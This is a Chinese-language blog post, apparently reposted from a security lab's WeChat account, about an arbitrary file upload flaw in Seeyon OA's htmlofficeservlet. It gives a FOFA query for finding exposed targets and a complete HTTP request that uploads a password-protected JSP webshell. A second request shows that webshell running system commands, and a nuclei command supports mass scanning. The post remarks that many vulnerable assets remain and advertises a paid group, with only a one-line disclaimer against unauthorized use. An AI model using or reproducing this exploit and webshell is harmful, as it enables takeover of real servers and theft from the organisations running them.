致远OA htmlofficeservlet 任意文件上传

渗透技巧 2年前 (2022) admin
473 0 0

0x01 漏洞描述

致远OA办公自动化软件,用于OA办公自动化软件的开发销售。2010年,用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司(简称:致远互联)成立于2002年3月,总部设立在北京,是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA系统存在任意文件上传漏洞,攻击者通过漏洞可以上传木马文件,导致服务器失陷

致远OA htmlofficeservlet 任意文件上传

0x02 漏洞复现

fofaapp=”致远互联-OA”

1.执行POC,上传webshell

POST /seeyon/htmlofficeservlet HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Content-Length: 1118Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeDNT: 1Upgrade-Insecure-Requests: 1
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlVOPTION=S3WYOSWLBSGrcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66CREATEDATE=wUghPB3szB3Xwg66RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6originalFileId=wV66originalCreateDate=wUghPB3szB3Xwg66FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6needReadFile=yRWZdAS6originalCreateDate=wLSGP4oEzLKAz4=iz=66<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("calsee".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>>a6e4f045d4b8506bf492ada7e3390d7ce

致远OA htmlofficeservlet 任意文件上传


2.访问webshell,执行dir命令,得到回显

GET /seeyon/testtesta.jsp?pwd=calsee&cmd=cmd+/c+dir HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeDNT: 1Upgrade-Insecure-Requests: 1

致远OA htmlofficeservlet 任意文件上传


3.nuclei批量验证脚本已发表于知识星球(还存在较多资产)

nuclei.exe -t zhiyuanOA_upload.yaml -l subs.txt -stats

致远OA htmlofficeservlet 任意文件上传

(注:本文章为技术分享,禁止任何非授权攻击行为)


网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精彩,敬请期待!
???

致远OA htmlofficeservlet 任意文件上传

长按二维码识别进入

0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):致远OA htmlofficeservlet 任意文件上传

版权声明:admin 发表于 2022年9月16日 下午6:23。
转载请注明:致远OA htmlofficeservlet 任意文件上传 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...